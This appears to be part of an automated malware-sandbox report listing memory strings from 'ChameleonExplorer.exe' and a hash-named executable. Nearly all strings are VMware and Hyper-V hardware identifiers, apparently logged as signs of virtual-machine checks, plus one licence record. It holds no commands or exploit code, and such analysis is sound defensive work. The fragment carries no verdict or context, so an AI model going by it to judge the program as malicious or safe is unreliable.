                      Source: ChameleonExplorer.exe, 00000012.00000002.522386790.0000000003C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWnWWW
                      Source: ChameleonExplorer.exe, 00000012.00000002.517693583.0000000003179000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 7VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021\
                      Source: ChameleonExplorer.exe, 00000012.00000003.392324488.0000000003C49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.505150388.0000000004CE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.1h[
                      Source: ChameleonExplorer.exe, 00000012.00000003.501264581.0000000004D16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VM
                      Source: ChameleonExplorer.exe, 00000012.00000002.520165680.0000000003A91000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW71.00V.18227214.B64.2106252220.06/25/2021..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....
                      Source: ChameleonExplorer.exe, 00000012.00000002.520165680.0000000003A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ...............PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHAP
                      Source: ChameleonExplorer.exe, 00000012.00000002.526368980.000000000525B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.420910792.0000000004C49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20
                      Source: ChameleonExplorer.exe, 00000012.00000003.401813254.0000000003C35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb
                      Source: ChameleonExplorer.exe, 00000012.00000002.517693583.0000000003187000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Z#$prg$explorer#$type$trial#$ver$pro#$name$#$mail$#$date$25.03.2023#$hid$F5C6EA6370B66420#$d7.VMware7.....
                      Source: ChameleonExplorer.exe, 00000012.00000003.422711733.0000000004C12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/20
                      Source: ChameleonExplorer.exe, 00000012.00000002.520165680.0000000003A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW71.00V.18227214.B64.2106252220.06/25/2021..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................
                      Source: ChameleonExplorer.exe, 00000012.00000003.441671519.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                      Source: ChameleonExplorer.exe, 00000012.00000002.517693583.0000000003187000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: e.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.....
                      Source: ChameleonExplorer.exe, 00000012.00000003.389352064.0000000003C35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
                      Source: ChameleonExplorer.exe, 00000012.00000003.410631725.0000000003CB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7&
                      Source: ChameleonExplorer.exe, 00000012.00000003.407753399.0000000003CA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096M
                      Source: ChameleonExplorer.exe, 00000006.00000003.324097015.000000000317C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 7VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021VMware,
                      Source: ChameleonExplorer.exe, 00000012.00000003.410631725.0000000003CB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7&
                      Source: ChameleonExplorer.exe, 00000012.00000003.476336510.0000000004CC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000002.520165680.0000000003A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW71.00V.18227214.B64.2106252220.06/25/2021..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................`
                      Source: ChameleonExplorer.exe, 00000012.00000003.441671519.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1
                      Source: ChameleonExplorer.exe, 00000011.00000003.350074511.0000000001539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: re, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.445981366.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000002.520165680.0000000003A91000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: N&..........................VMware, Inc..VMW71.00V.18227214.B64.2106252220.06/25/2021..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....
                      Source: ChameleonExplorer.exe, 00000012.00000003.503453373.0000000004D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.390284345.0000000003C3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7
                      Source: ChameleonExplorer.exe, 00000012.00000003.443897794.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d78
                      Source: ChameleonExplorer.exe, 00000012.00000003.444400655.0000000004C61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7:
                      Source: ChameleonExplorer.exe, 00000006.00000003.324097015.0000000003194000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW71.00V.18227214.B64.2106252220.06/25/2021..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM
                      Source: ChameleonExplorer.exe, 00000012.00000003.451391133.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 2`
                      Source: ChameleonExplorer.exe, 00000012.00000003.483457199.0000000004CC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0
                      Source: ChameleonExplorer.exe, 00000012.00000003.482178257.0000000004CC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.1gu
                      Source: ChameleonExplorer.exe, 00000012.00000003.441671519.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
                      Source: ChameleonExplorer.exe, 00000012.00000003.445981366.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual
                      Source: ChameleonExplorer.exe, 00000012.00000003.404729031.0000000003C89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.1i:
                      Source: ChameleonExplorer.exe, 00000012.00000003.420530800.0000000004C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: ChameleonExplorer.exe, 00000012.00000003.470862371.0000000004CB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 2m
                      Source: ChameleonExplorer.exe, 00000012.00000003.448514812.0000000003CB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 2o
                      Source: ChameleonExplorer.exe, 00000012.00000003.508123502.0000000004D22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 2t
                      Source: ChameleonExplorer.exe, 00000006.00000003.322410185.0000000003B96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214
                      Source: ChameleonExplorer.exe, 00000012.00000003.448514812.0000000003CB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 2o
                      Source: ChameleonExplorer.exe, 00000012.00000003.508123502.0000000004D22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 2t
                      Source: ChameleonExplorer.exe, 00000006.00000003.309070199.0000000001541000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff
                      Source: ChameleonExplorer.exe, 00000012.00000003.419068186.0000000004C0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/202
                      Source: ChameleonExplorer.exe, 00000012.00000003.451085859.0000000004CA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18
                      Source: ChameleonExplorer.exe, 00000012.00000002.526368980.0000000005243000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: IENDe.VMware
                      Source: ChameleonExplorer.exe, 00000012.00000003.470862371.0000000004CB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 2m
                      Source: ChameleonExplorer.exe, 00000012.00000002.526368980.0000000005243000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: e.VMware
                      Source: ChameleonExplorer.exe, 00000012.00000003.481895001.0000000004CC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware,
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337666852.00000000048BD000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.383918050.00000000048BD000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000006.00000002.326211855.000000000151F000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.363119219.000000000150C000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000002.522989954.0000000003C95000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000003.405320392.0000000003C93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: ChameleonExplorer.exe, 00000012.00000003.402073304.0000000003C36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002_Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\409Hyper-V RAWe
                      Source: ChameleonExplorer.exe, 00000012.00000002.517693583.0000000003179000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 7VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
                      Source: ChameleonExplorer.exe, 00000012.00000003.505029031.0000000004D1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7V
                      Source: ChameleonExplorer.exe, 00000012.00000003.451391133.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 2`
                      Source: ChameleonExplorer.exe, 00000012.00000003.494634114.0000000004CE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneV
                      Source: ChameleonExplorer.exe, 00000012.00000002.520165680.0000000003A8B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW71.00V.18227214.B64.2106252220.06/25/2021..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................2
                      Source: ChameleonExplorer.exe, 00000012.00000003.502091244.0000000004D1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, I
                      Source: ChameleonExplorer.exe, 00000012.00000002.520165680.0000000003A84000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW71.00V.18227214.B64.2106252220.06/25/2021..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................0
                      Source: ChameleonExplorer.exe, 00000012.00000003.476937486.0000000004CBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37
                      Source: ChameleonExplorer.exe, 00000012.00000003.445981366.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 2~
                      Source: ChameleonExplorer.exe, 00000011.00000003.344998251.000000000153C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.437311211.0000000004C44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.405435943.0000000003C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware,
                      Source: ChameleonExplorer.exe, 00000012.00000003.426018492.0000000004C36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/
                      Source: ChameleonExplorer.exe, 00000011.00000003.351127386.000000000150C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                      Source: ChameleonExplorer.exe, 00000012.00000002.527446383.0000000006970000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5
                      Source: ChameleonExplorer.exe, 00000012.00000003.451085859.0000000004C6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.None
                      Source: ChameleonExplorer.exe, 00000012.00000003.445981366.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 2~
                      Source: ChameleonExplorer.exe, 00000012.00000003.438139988.0000000004C3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVM
                      Source: ChameleonExplorer.exe, 00000006.00000003.308958993.0000000001559000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.493859749.0000000004D11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: re-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.420530800.0000000004C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA
                      Source: ChameleonExplorer.exe, 00000012.00000003.464562073.0000000004C86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 2i!
                      Source: ChameleonExplorer.exe, 00000012.00000003.441671519.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                      Source: ChameleonExplorer.exe, 00000012.00000003.485916045.0000000004CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0
                      Source: ChameleonExplorer.exe, 00000012.00000003.438778546.0000000004C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                      Source: ChameleonExplorer.exe, 00000012.00000003.478277475.0000000004CB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGAs
                      Source: ChameleonExplorer.exe, 00000012.00000003.505350634.0000000004D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.1
                      Source: ChameleonExplorer.exe, 00000012.00000003.482178257.0000000004CC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.1ds
                      Source: ChameleonExplorer.exe, 00000011.00000003.348005571.000000000150C000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000003.346864700.000000000150C000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000003.352722769.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000003.391515521.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000003.391203097.0000000003C35000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000002.525657397.0000000004BA0000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000003.351553891.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000003.363699633.00000000014EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: ChameleonExplorer.exe, 00000006.00000003.324097015.000000000317C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 7VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021tform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot 